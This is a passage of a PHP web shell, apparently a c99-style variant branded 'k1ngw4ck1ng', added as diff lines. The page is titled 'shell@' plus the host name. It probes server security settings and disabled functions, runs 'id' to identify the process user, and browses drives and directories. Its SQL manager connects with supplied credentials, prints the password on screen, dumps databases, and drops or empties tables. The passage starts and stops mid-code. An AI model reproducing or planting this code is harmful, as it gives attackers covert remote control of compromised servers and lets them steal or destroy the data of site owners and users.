= FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";} +else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} +$sort = htmlspecialchars($sort); +if (empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?> + +<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title>shell@<?php echo getenv("HTTP_HOST"); ?></title><STYLE> +TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;} +.style1 { + color: #FF0000; + font-weight: bold; +} +.style2 {font-size: -3} +</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><div align="center"><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"></p> + <p><font size="-3"><span class="style2"></br> + <font color="#333333">k1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1</font><font color="white">ngw4ck1n</font><font color="#333333">gw4c</font><font color="white">k</font><font color="#333333">1ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck</font><font color="white">1</font><font color="#333333">ngw4ck1ngw4ck1ng</font><font color="white">w4</font><font color="#333333">ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4ck1ngw</font><font color="white">4</font><font color="#333333">ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4c</font><font color="white">k1ng</font><font color="#333333">w4ck1ngw4ck1ngw4ck1ngw4ck1ng</font><br> + + <font color="#333333">w4ck1ngw4c</font><font color="white">k1n</font><font color="#333333">gw4ck</font><font color="white">1ngw4</font><font color="#333333">ck</font><font color="white">1ngw4ck1n</font><font color="#333333">gw</font><font color="white">4ck1n</font><font color="#333333">g</font><font color="white">w</font><font color="#333333">4ck1ngw4ck</font><font color="white">1ngw4</font><font color="#333333">ck</font><font color="white">1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1</font><font color="#333333">ngw4ck</font><font color="white">1n</font><font color="#333333">gw4ck1ngw</font><font color="white">4ck</font><font color="#333333">1ng</font><font color="white">w4ck</font><font color="#333333">1ngw4ck1ngw4ck1ngw4ck1ngw4ck</font><br> + + <font color="#333333">1ngw4ck1ng</font><font color="white">w4ck</font><font color="#333333">1ngw</font><font color="white">4ck1</font><font color="#333333">ngw4</font><font color="white">ck1</font><font color="#333333">ng</font><font color="white">w4c</font><font color="#333333">k1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1</font><font color="#333333">ngw</font><font color="white">4</font><font color="#333333">ck</font><font color="white">1ngw4ck1ng</font><font color="#333333">w</font><font color="white">4ck</font><font color="#333333">1ng</font><font color="white">w4ck1n</font><font color="#333333">gw4ck1ngw</font><font color="white">4ck</font><font color="#333333">1ngw4ck1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1ngw</font><font color="#333333">4ck1n</font><font color="white">gw4ck1ngw4ck</font><font color="#333333">1ngw4ck1ngw</font><br> + + <font color="#333333">4ck1ngw4ck1</font><font color="white">ngw4</font><font color="#333333">ck</font><font color="white">1ngw4</font><font color="#333333">ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw</font><font color="white">4ck1</font><font color="#333333">n</font><font color="white">gw4</font><font color="#333333">ck1</font><font color="white">ngw4ck</font><font color="#333333">1ngw4</font><font color="white">ck</font><font color="#333333">1</font><font color="white">ngw4ck1n</font><font color="#333333">gw4ck1ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck1ngw4</font><font color="white">ck1n</font><font color="#333333">g</font><font color="white">w4ck1ngw4ck</font><font color="#333333">1ngw4c</font><font color="white">k1ngw</font><font color="#333333">4ck1ngw4ck1</font><br> + + <font color="#333333">ngw4ck1ngw4c</font><font color="white">k1ngw4ck1ng</font><font color="#333333">w4</font><font color="white">ck1n</font><font color="#333333">gw4ck1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1ngw4ck1n</font><font color="#333333">gw4ck1n</font><font color="white">gw4ck1ngw4ck</font><font color="#333333">1ngw4ck1ng</font><font color="white">w4ck1</font><font color="#333333">ngw4ck1</font><font color="white">ngw4ck1ngw4ck1ng</font><font color="#333333">w4ck1ng</font><font color="white">w4ck1n</font><font color="#333333">gw4ck1ngw4</font><br> + + <font color="#333333">ck1ngw4ck1ng</font><font color="white">w4ck1ngw</font><font color="#333333">4c</font><font color="white">k1ngw4c</font><font color="#333333">k1ng</font><font color="white">w4ck1ngw4c</font><font color="#333333">k1n</font><font color="white">gw4c</font><font color="#333333">k1ngw4c</font><font color="white">k1ngw4ck1ngw4ck</font><font color="#333333">1ngw4c</font><font color="white">k1</font><font color="#333333">n</font><font color="white">gw4</font><font color="#333333">ck1ngw4</font><font color="white">ck1ngw4ck1ngw4ck1ngw4ck1ngw</font><font color="#333333">4ck1ngw4ck1n</font><br> + + <font color="#333333">gw4ck1ngw4ck1</font><font color="white">ngw4ck</font><font color="#333333">1ngw</font><font color="white">4ck1ng</font><font color="#333333">w4c</font><font color="white">k1ngw</font><font color="#333333">4</font><font color="white">ck1n</font><font color="#333333">gw4c</font><font color="white">k1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1ngw4ck1ngw4ck1</font><font color="#333333">ngw4ck</font><font color="white">1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4</font><font color="#333333">c</font><font color="white">k1ngw4</font><font color="#333333">ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw4</font><font color="white">ck1</font><font color="#333333">ngw4ck1ngw4c</font><br> + + <font color="#333333">k1ngw4ck1ngw4c</font><font color="white">k1ngw</font><font color="#333333">4ck1n</font><font color="white">gw4ck</font><font color="#333333">1ngw4ck1n</font><font color="white">gw4c</font><font color="#333333">k1ngw</font><font color="white">4ck1ngw4ck1n</font><font color="#333333">g</font><font color="white">w4ck1</font><font color="#333333">ngw4</font><font color="white">ck1ngw4ck</font><font color="#333333">1ngw</font><font color="white">4ck</font><font color="#333333">1ngw4c</font><font color="white">k1n</font><font color="#333333">gw</font><font color="white">4ck1</font><font color="#333333">ngw4ck1n</font><font color="white">g</font><font color="#333333">w4ck1n</font><font color="white">gw4c</font><font color="#333333">k1ngw4ck1ng</font><br> + + <font color="#333333">w4ck1ngw4ck1ngw4</font><font color="white">ck1</font><font color="#333333">ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck1ngw4</font><font color="white">ck1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1ngw</font><font color="#333333">4ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw4ck</font><font color="white">1ngw4ck1ngw4c</font><font color="#333333">k1n</font><font color="white">gw4</font><font color="#333333">ck1n</font><font color="white">gw4</font><font color="#333333">ck1ngw4ck1ngw</font><font color="white">4ck1ng</font><font color="#333333">w4ck1ngw4ck</font><br> + + <font color="#333333">1ngw4ck1ngw4ck1ngw4ck1ngw4</font><font color="white">c</font><font color="#333333">k1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1ngw4ck1ngw4ck1ngw4ck1n</font><font color="white">g</font><font color="#333333">w4ck1ngw4c</font><font color="white">k1ngw4</font><font color="#333333">c</font><font color="white">k</font><font color="#333333">1ngw4c</font><font color="white">k1n</font><font color="#333333">gw4c</font><font color="white">k1n</font><font color="#333333">gw4ck1ngw4ck1ngw</font><font color="white">4ck1n</font><font color="#333333">gw4ck1ngw</font><br> + + <font color="#333333">4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ng</font><font color="white">w4</font><font color="#333333">ck1ngw4ck1ngw4ck1n</font><font color="white">gw4ck</font><font color="#333333">1ngw4ck1</font><br> + <font color="#333333">ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4ck1ngw4ck1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1ngw4</font></br> + </span>&nbsp;</p></th></tr><tr><td><p align="left"><b>Software:&nbsp;<?php echo $DISP_SERVER_SOFTWARE; ?></b>&nbsp;</p><p align="left"><b>System Info:&nbsp;<?php echo wordwrap(php_uname(),90,"<br>",1); ?></b>&nbsp;</p><? echo "<b>Disabled functions</b>: <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} ?><p align="left"><b>We are: <?php if (!$win) {echo wordwrap(myshellexec("id"),90,"<br>",1);} else {echo get_current_user();} ?><?php $curl_on = @function_exists('curl_version'); +echo "<br/>cURL: <b>".(($curl_on)?("<font color=green>ON</font>"):("<font color=red>OFF</font>")); ?></br><? if(@ini_get("register_globals")){$reg_g="<font color=green>ON</font>";}else{$reg_g="<font color=red>OFF</font>";} echo("<b>Register globals:</b> $reg_g"); ?><?php echo "<br/>MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font>"; } else { echo "<font color=red>OFF</font>"; } +echo "</b>"; +echo "<br/>MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?><?php echo "<br/>PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?><?php echo "<br/>Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font>";}else{echo "<font color=red>OFF</font>";} ?> </b>&nbsp;</p><p align="left"><b>Safe-mode:&nbsp;<?php echo $hsafemode; ?></b></p><p align="left"><?php +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);} +$d = str_replace("\\",DIRECTORY_SEPARATOR,$d); +if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} +$d = str_replace("\\\\","\\",$d); +$dispd = htmlspecialchars($d); +$pd = $e = explode(DIRECTORY_SEPARATOR,substr($d,0,-1)); +$i = 0; +foreach($pd as $b) +{ + $t = ""; + $j = 0; + foreach ($e as $r) + { + $t.= $r.DIRECTORY_SEPARATOR; + if ($j == $i) {break;} + $j++; + } + echo "<a href=\"".$surl."act=ls&d=".urlencode($t)."&sort=".$sort."\"><b>".htmlspecialchars($b).DIRECTORY_SEPARATOR."</b></a>"; + $i++; +} +echo "&nbsp;&nbsp;&nbsp;"; +if (is_writable($d)) +{ + $wd = TRUE; + $wdt = "<font color=green>[ ok ]</font>"; + echo "<b><font color=green>".view_perms(fileperms($d))."</font></b>"; +} +else +{ + $wd = FALSE; + $wdt = "<font color=red>[ Read-Only ]</font>"; + echo "<b>".view_perms_color($d)."</b>"; +} +if (is_callable("disk_free_space")) +{ + $free = disk_free_space($d); + $total = disk_total_space($d); + if ($free === FALSE) {$free = 0;} + if ($total === FALSE) {$total = 0;} + if ($free < 0) {$free = 0;} + if ($total < 0) {$total = 0;} + $used = $total-$free; + $free_percent = round(100/($total/$free),2); + echo "<br><b>Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)</b>"; + +} +echo "<br>"; +echo "<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>"; +$letters = ""; +if ($win) +{ + $v = explode("\\",$d); + $v = $v[0]; + foreach (range("a","z") as $letter) + { + $bool = $isdiskette = in_array($letter,$safemode_diskettes); + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + $letters .= "<a href=\"".$surl."act=ls&d=".urlencode($letter.":\\")."\"".($isdiskette?" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":"").">[ "; + if ($letter.":" != $v) {$letters .= $letter;} + else {$letters .= "<font color=green>".$letter."</font>";} + $letters .= " ]</a> "; + } + } + if (!empty($letters)) {echo "<b>Detected drives</b>: ".$letters."<br>";} +} +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "<a href=\"".$item[1]."\">".$item[0]."</a>&nbsp;&nbsp;&nbsp;&nbsp;"; + } +} +echo "</p></td></tr></table><br>"; +if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".$donated_html."</td></tr></table><br>";} +echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">"; +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><td width="100%" height="1" colspan="2" valign="top"><center><?php + if ($sql_server) + { + $sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd); + $err = mysql_smarterror(); + @mysql_select_db($sql_db,$sql_sock); + if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_smarterror();} + } + else {$sql_sock = FALSE;} + echo "<b>SQL Manager:</b><br>"; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "<center><b>Can't connect</b></center>"; echo "<b>".$err."</b>";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "<center><b>MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")</b><br>"; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\"><b>".$item[0]."</b></a> ] ";}} + echo "</center>"; + } + echo "</td></tr><tr>"; + if (!$sql_sock) {?><td width="28%" height="100" valign="top"><center><font size="5"><br/></font></center><li>If login is null, login is owner of process.<li>If host is null, host is localhost</b><li>If port is null, port is 3306 (default)</td><td width="90%" height="1" valign="top"><TABLE height=1 cellSpacing=0 cellPadding=0 width="100%" border=0><tr><td>&nbsp;<table><tr><td><b>Username</b></td><td><b>Password</b>&nbsp;</td><td><b>Database</b>&nbsp;</td></tr><form action="<?php echo $surl; ?>" method="POST"><input type="hidden" name="act" value="sql"><tr><td><input type="text" name="sql_login" value="root" maxlength="64"></td><td><input type="password" name="sql_passwd" value="" maxlength="64"></td><td><input type="text" name="sql_db" value="" maxlength="64"></td></tr><tr><td><b>Host</b></td><td><b>PORT</b></td></tr><tr><td align=right><input type="text" name="sql_server" value="localhost" maxlength="64"></td><td><input type="text" name="sql_port" value="3306" maxlength="6" size="3"></td><td><input type="submit" value="Connect"></td></tr><tr><td></td></tr></form></table></td><?php } + else + { + //Start left panel + if (!empty($sql_db)) + { + ?><td width="25%" height="100%" valign="top"><a href="<?php echo $surl."w4/act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_tables($sql_db); + if (!$result) {echo mysql_smarterror();} + else + { + echo "---[ <a href=\"".$sql_surl."&\"><b>".htmlspecialchars($sql_db)."</b></a> ]---<br>"; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "<b>?nbsp;<a href=\"".$sql_surl."sql_db=".htmlspecialchars($sql_db)."&sql_tbl=".htmlspecialchars($row[0])."\"><b>".htmlspecialchars($row[0])."</b></a> (".$count_row[0].")</br></b>"; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?><td width="1" height="100" valign="top"><a href="<?php echo $sql_surl; ?>"><b>Home</b></a><hr size="1" noshade><?php + $result = mysql_list_dbs($sql_sock); + if (!$result) {echo mysql_smarterror();} + else + { + ?><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><select name="sql_db"><?php + $c = 0; + $dbs = ""; + while ($row = mysql_fetch_row($result)) {$dbs .= "<option value=\"".$row[0]."\""; if ($sql_db == $row[0]) {$dbs .= " selected";} $dbs .= ">".$row[0]."</option>"; $c++;} + echo "<option value=\"\">Databases (".$c.")</option>"; + echo $dbs; + } + ?></select><hr size="1" noshade>Please, select database<hr size="1" noshade><input type="submit" value="Go"></form><?php + } + //End left panel + echo "</td><td width=\"100%\" height=\"1\" valign=\"top\">"; + //Start center panel + $diplay = TRUE; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "<hr size=\"1\" noshade><center><b>There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").<br>"; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ <a href=\"".$item[1]."\">".$item[0]."</a> ] ";}} + echo "</b></center>"; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "<hr size=\"1\" noshade>"; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "<table border=\"0\" width=\"100%\" height=\"1\"><tr><td><form action=\"".$sql_surl."\" method=\"POST\"><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "</b><br><br><textarea name=\"sql_query\" cols=\"100\" rows=\"10\">".htmlspecialchars($sql_query)."</textarea><br><br><input type=\"hidden\" name=\"sql_act\" value=\"query\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"submit\" value=\"1\"><input type=\"hidden\" name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=\"submit\" name=\"sql_confirm\" value=\"Yes\">&nbsp;<input type=\"submit\" value=\"No\"></form></td></tr></table>";} + } + if (in_array($sql_act,$acts)) + { + ?><table border="0" width="100%" height="1"><tr> + <td width="30%" height="1"><b>Create a new table:</b> + <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newtbl"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newtbl" size="20">&nbsp;<input type="submit" value="Create"></form></td> + + <td width="30%" height="1"><b>Dump DataBase:</b> + <form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="dump"><input type="hidden" name="sql_db" value="<?php echo htmlspecialchars($sql_db); ?>"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="dump_file" size="30" value="<?php echo "dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql"; ?>">&nbsp;<input type="submit" name=\"submit\" value="Dump"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php + if (!empty($sql_act)) {echo "<hr size=\"1\" noshade>";} + if ($sql_act == "newtbl") + { + echo "<b>"; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>"; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = FALSE; + echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_act\" value=\"dump\"><input type=\"hidden\" name=\"sql_db\" 